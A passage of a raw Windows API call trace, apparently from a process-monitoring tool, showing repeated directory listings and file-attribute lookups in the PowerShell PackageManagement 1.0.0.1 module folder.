nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0171.179] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.ArchiverProviders.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0171.179] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.CoreProviders.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0171.180] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3de00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0171.180] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MetaProvider.PowerShell.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0171.180] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsiProvider.dll", cAlternateFileName="MID877~1.DLL")) returned 1 [0171.180] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsuProvider.dll", cAlternateFileName="MI0F1E~1.DLL")) returned 1 [0171.180] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PackageManagement.dll", cAlternateFileName="MI6305~1.DLL")) returned 1 [0171.180] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.format.ps1xml", cAlternateFileName="PACKAG~1.PS1")) returned 1 [0171.180] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.psd1", cAlternateFileName="PACKAG~1.PSD")) returned 1 [0171.180] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 1 [0171.181] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 0 [0171.181] FindClose (in: hFindFile=0x1e35146b720 | out: hFindFile=0x1e35146b720) returned 1 [0171.181] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c550) returned 1 [0171.181] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c510) returned 1 [0171.181] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c620) returned 1 [0171.181] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0xb156f8c100, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0171.181] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\*"), lpFindFileData=0xb156f8c330 | out: lpFindFileData=0xb156f8c330*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e35146a880 [0171.181] FindNextFileW (in: hFindFile=0x1e35146a880, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0171.182] FindNextFileW (in: hFindFile=0x1e35146a880, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd254645, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0171.182] FindNextFileW (in: hFindFile=0x1e35146a880, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.ArchiverProviders.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0171.182] FindNextFileW (in: hFindFile=0x1e35146a880, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.CoreProviders.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0171.182] FindNextFileW (in: hFindFile=0x1e35146a880, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3de00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0171.182] FindNextFileW (in: hFindFile=0x1e35146a880, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MetaProvider.PowerShell.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0171.182] FindNextFileW (in: hFindFile=0x1e35146a880, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsiProvider.dll", cAlternateFileName="MID877~1.DLL")) returned 1 [0171.182] FindNextFileW (in: hFindFile=0x1e35146a880, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsuProvider.dll", cAlternateFileName="MI0F1E~1.DLL")) returned 1 [0171.182] FindNextFileW (in: hFindFile=0x1e35146a880, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PackageManagement.dll", cAlternateFileName="MI6305~1.DLL")) returned 1 [0171.183] FindNextFileW (in: hFindFile=0x1e35146a880, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.format.ps1xml", cAlternateFileName="PACKAG~1.PS1")) returned 1 [0171.183] FindNextFileW (in: hFindFile=0x1e35146a880, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.psd1", cAlternateFileName="PACKAG~1.PSD")) returned 1 [0171.183] FindNextFileW (in: hFindFile=0x1e35146a880, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 1 [0171.183] FindNextFileW (in: hFindFile=0x1e35146a880, lpFindFileData=0xb156f8c2f0 | out: lpFindFileData=0xb156f8c2f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0171.183] FindClose (in: hFindFile=0x1e35146a880 | out: hFindFile=0x1e35146a880) returned 1 [0171.183] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c550) returned 1 [0171.183] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c510) returned 1 [0171.183] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0xb156f8c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0171.183] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c630) returned 1 [0171.184] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1"), fInfoLevelId=0x0, lpFileInformation=0xb156f8c710 | out: lpFileInformation=0xb156f8c710*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0171.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c5f0) returned 1 [0171.184] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c680) returned 1 [0171.184] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0xb156f8c160, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0171.184] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\*"), lpFindFileData=0xb156f8c390 | out: lpFindFileData=0xb156f8c390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e35146b060 [0171.184] FindNextFileW (in: hFindFile=0x1e35146b060, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0171.184] FindNextFileW (in: hFindFile=0x1e35146b060, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd254645, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0171.184] FindNextFileW (in: hFindFile=0x1e35146b060, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.ArchiverProviders.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0171.185] FindNextFileW (in: hFindFile=0x1e35146b060, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.CoreProviders.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0171.185] FindNextFileW (in: hFindFile=0x1e35146b060, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3de00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0171.185] FindNextFileW (in: hFindFile=0x1e35146b060, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MetaProvider.PowerShell.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0171.185] FindNextFileW (in: hFindFile=0x1e35146b060, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsiProvider.dll", cAlternateFileName="MID877~1.DLL")) returned 1 [0171.185] FindNextFileW (in: hFindFile=0x1e35146b060, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsuProvider.dll", cAlternateFileName="MI0F1E~1.DLL")) returned 1 [0171.185] FindNextFileW (in: hFindFile=0x1e35146b060, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PackageManagement.dll", cAlternateFileName="MI6305~1.DLL")) returned 1 [0171.185] FindNextFileW (in: hFindFile=0x1e35146b060, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.format.ps1xml", cAlternateFileName="PACKAG~1.PS1")) returned 1 [0171.185] FindNextFileW (in: hFindFile=0x1e35146b060, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.psd1", cAlternateFileName="PACKAG~1.PSD")) returned 1 [0171.186] FindNextFileW (in: hFindFile=0x1e35146b060, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 1 [0171.186] FindNextFileW (in: hFindFile=0x1e35146b060, lpFindFileData=0xb156f8c350 | out: lpFindFileData=0xb156f8c350*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 0 [0171.186] FindClose (in: hFindFile=0x1e35146b060 | out: hFindFile=0x1e35146b060) returned 1 [0171.186] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c5b0) returned 1 [0171.186] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c570) returned 1 [0171.186] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.psd1" (normalized: "c:\\program 